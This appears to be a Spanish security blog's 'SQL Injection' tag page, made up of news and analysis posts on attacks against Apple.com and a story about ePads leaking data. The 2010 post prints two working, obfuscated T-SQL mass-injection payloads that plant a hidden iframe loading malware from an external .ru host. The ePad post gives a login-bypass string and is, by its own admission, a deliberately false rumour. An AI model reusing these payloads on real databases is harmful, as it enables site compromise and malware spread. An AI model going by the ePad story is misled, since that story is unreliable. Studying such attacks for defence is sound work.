Menú principal

Mostrando entradas con la etiqueta SQL Injection. Mostrar todas las entradas
Mostrando entradas con la etiqueta SQL Injection. Mostrar todas las entradas

lunes, 20 de agosto de 2018

Guía de seguridad para tu Secure Summer! (Parte 1)

Las técnicas de ciberataques han cambiado mucho durante los últimos años. Seguro que algunos de los que estáis leyendo este artículo recuerda cuando múltiples cuentas de Hotmail empezaron a recibir los primeros mensajes de advance-fee scam. Una modalidad en particular se hizo muy famosa, pues consistía en un mensaje de un supuesto príncipe nigeriano concediéndote, tras intentar venderte una historia increíble, una fortuna de 1M$ a cambio de una módica cantidad de dinero. A raíz de los incidentes ocurridos durante los últimos meses, como el escándalo de Facebook con Cambridge Analytica, son cada vez más los ojos que miran con una preocupación creciente todo lo relacionado con la privacidad del usuario y la protección de los datos personales del mismo. Por ello, la ciberseguridad está dejando de ser la desconocida que era antaño, adquiriendo la notoriedad e importancia que deben tener en un mundo cada vez más conectado.

lunes, 17 de febrero de 2014

Guía de Desarrollo Seguro: "Los hackers no son malos"

Desde Apple se ha publicado un documento de 123 páginas con información útil para mejorar la calidad de las aplicaciones respecto a seguridad. La Guía de Desarrollo de Código Seguro de Apple recoge las principales vulnerabilidades de seguridad que se encuentran en las aplicaciones para tecnologías Apple como iOS y OS X, pero en la introducción nos ha gustado la diferenciación que hace entre Hackers, Crackers y Atacantes, donde se cita que "Hackers are not malicious in general [...]".  El texto no tiene desperdicio:

Figura 1: Hackers según Apple

El contenido de la guía recoge ataques como XSS, SQL Injection, explotación de Buffer Overflows y Buffer Underflows, ataques de condición de carrera o acceso inseguro a ficheros. La verdad es que si quieres aprender a desarrollar apps para iOS o para OS X, o si ya desarrollas apps, te recomendamos que leas esta guía en detenimiento, que está bien estructurada y da prácticas recomendaciones.

miércoles, 27 de abril de 2011

ePads de Ebay roban tus datos y los envían a China

Toda la información de este artículo está basada en un trabajo de Fin de Master preparada para difundir un rumor falso por Internet y medir el alcance del impacto del mismo en Internet. Más info

Luis Argente ha sufrido en primera persona y un hecho bastante preocupante que estaba ocurriendo con su ePad. Este dispositivo, con un nombre elegido para recordar al nombre del tablet de Apple, no tienen nada que ver con iPad. ePad es un tableta que copia la estética del Apple iPad, pero que está construida con un sistema operativo Android Como cuenta en su blog, Luis no pudo resistirse y se compró el ePad a través de Ebay por 100 dolares americados y la acogió en su casa. Al cabo de empezar a trabajar con ella, empezó a sentir que la conexión WiFi de su casa le iba mal, tal y como él narra.

Se dio cuenta que algo malo ocurría cuando notó que su router seguía enviando paquetes a pesar de que él no estaba haciendo nada. Como buen técnico se preguntó por lo que estaba ocurriendo, así que decidió sacar Wireshark para analizar el tráfico de red generado.

Rápidamente se dio cuenta que la dirección IP que originaba el tráfico era la de su, hasta ese momento, querido ePad. Pero, ¿a dónde se enviaban esos paquetes? Pues estaba conectándose a un host alojado en un servidor de China, concretamente a al sitio web http://o93472334.sooot.cn. Tanto se llegó a preocupar, que hasta abrió el ePad.

Para más INRI Luis descubrió que, al abrir la dirección web en un navegador, el sitio era vulnerable a SQL Injection y pudo comprobar que su ePad, al igual que muchos otros ePads al rededor del mundo, estaban enviando información de sus datos privados como imágenes, mensajes, histórico de navegación, etcétera. Con un simple ' or '1'='1 se conseguía acceso a los datos que se están robando y almacenando en el host.

Llegados a este punto y viendo lo que se está almacenando en este host sería bueno recomendar al usuario que si detecta este tipo de casos, ya sea con su ePad o con cualquier otro dispositivo, puede denunciar este tipo de prácticas directamente a la Guardia Civil. A continuación, se muestra una imagen con el tipo de datos que se van almacenando en el servidor. 


recordad que a veces pagamos caro lo barato, que no queremos decir que este tipo de prácticas no puedan ocurrir con otro tipo de dispositivos más caros. Sería muy interesante investigar la aplicación encargada de enviar la información al servidor, ya que puede ser que el ePad original no haga nada de esto, y sea solo algunos modelos manipulados y vendidos a través de Internet. Si alguno de vosotros sabéis algo no dudéis en poneros en contacto con nosotros

Quizá el siguiente paso sea detectar la aplicación encargada de esta transferencia de información e intentar eliminarla, y de este modo conseguir que los usuarios del ePad recuperen su privacidad. Lo que si es cierto, que hasta próximas noticias no es muy recomendable comprarse un ePad a través de Ebay.

jueves, 31 de marzo de 2011

La web de Apple otra vez hackeada para distribuir malware

Los ataques masivos para distribuir malware se empezaron a poner de moda hace ya varios años. La idea es que el atacante selecciona las víctimas a través de un programa automático que busca patrones en los buscadores como Google o Bing. Una vez obtenida una larga lista de sitios vulnerables, se realizan ataques SQL Injection a todos ellos, que están especialmente creados para introducir código script malicioso en la página web. Así, cuando un visitante navegue por la web vulnerada será atacado con un exploit que tratará de ejecutar un malware en su máquina.

En este caso, la empresa de seguridad Websense ha publicado cómo se ha producido un ataque en masa para añadir referencias maliciosas a LizaMoon.com en 280.000 sitios, utilizando esta técnica de SQL Injection en masa.

Figura 1: Apple.com hackeada
Lo curioso es que la web de Apple se ha vuelto a ver afectada y aparece entre los sitios vulnerados que distribuyen malware. Hay que decir que Apple está trabajando rápido y ha limpiado la web de cualquier referencia a este sitio, aunque aún es posible acceder a los resultados utilizando la caché de los buscadores, y ver como, en esta ocasión, el código era inyectado en el título de los podcast en iTunes.

Figura 2: Inyección en el código fuente del script malicioso

En este caso se desconoce el número de usuarios que han podido caer en el engaño, o el número de enlaces que resultaban efectivos, ya que estos podcasts también son leídos por medio de lectores RSS. El caso es que no es la primera vez que Apple cae en esquemas de ataques de SQL Injection masivo para distribuir malware. Ya en Agosto de 2010 cayó en otro ataque masivo a través de la web de iTunes.

Figura 3: Hackeo e inyección en Agosto de 2010

También fueron hackeados los foros el año pasado y, en Zone-h se puede ver una lista de sitios a los que se hizo defacement en Appe.com. Lo cierto es que la web de Apple deja mucho que desear en seguridad. Hace ya más de un mes y medio, nosotros reportamos unos fallos de seguridad en la web de Apple que encontramos, y tras un rápido correo de respuesta aún estamos esperando a ver si los arreglan, para que os los podamos contar.

Como recomendación final, para evitar que una navegación normal por una página web te infecte de malware te damos las recomendaciones habituales:

1) Ten todo el software de tu sistema actualizado.
2) Ten instalado un antimalware con protección en tiempo real.
3) Instala una solución AntiXSS en el navegador que utilices.
4) Navega por Internet con un usuario poco privilegiado.
5) No confíes en ninguna descarga de ficheros automática.

jueves, 19 de agosto de 2010

Apple.com afectado por un ataque masivo de SQL Injection utilizado para distribuir malware

Durante el análisis del impacto que un ataque automático había producido en las empresas se ha descubierto que ha infectado varias páginas de Apple.com. Este tipo de ataques se aprovechan de encontrar de forma masiva sitios vulnerables a ataques conocidos - ya sean vulnerabilidades SQL Injection, vulnerabilidades RFI en productos web o incluso el último fallo de ColdFusion - a través de los buscadores, para automatizar ataques de infección.

En este caso, como informa The Register, el ataque ha afectado a más de 538.000 páginas que se han visto infectadas con un script en un iframe que se utiliza para descargar malware. En la siguiente imagen puede verse como los sitios de Apple.com están infectados e indexados en Google.


Manuel Humberto Santander Peláez de SANS ha hecho un análisis del exploit. Las dos mutaciones del ataque, una vez des-ofuscadas, muestran como están basadas en explotar vulnerabilidades en aplicaciones web que trabajan contra bases de datos SQL Server:

Ataque 1

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))')
FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor


Dentro del CAST se inyecta:

[iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"][/iframe]

Es decir, un frame oculto que distribuye malware. El ataque 2 es similar

Ataque 2

declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR

Una vez más, a pesar de la cantidad de años que hace que se conocen las vulnerabilidades SQL Injection, un atacante hace un uso exitoso de ellas.

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares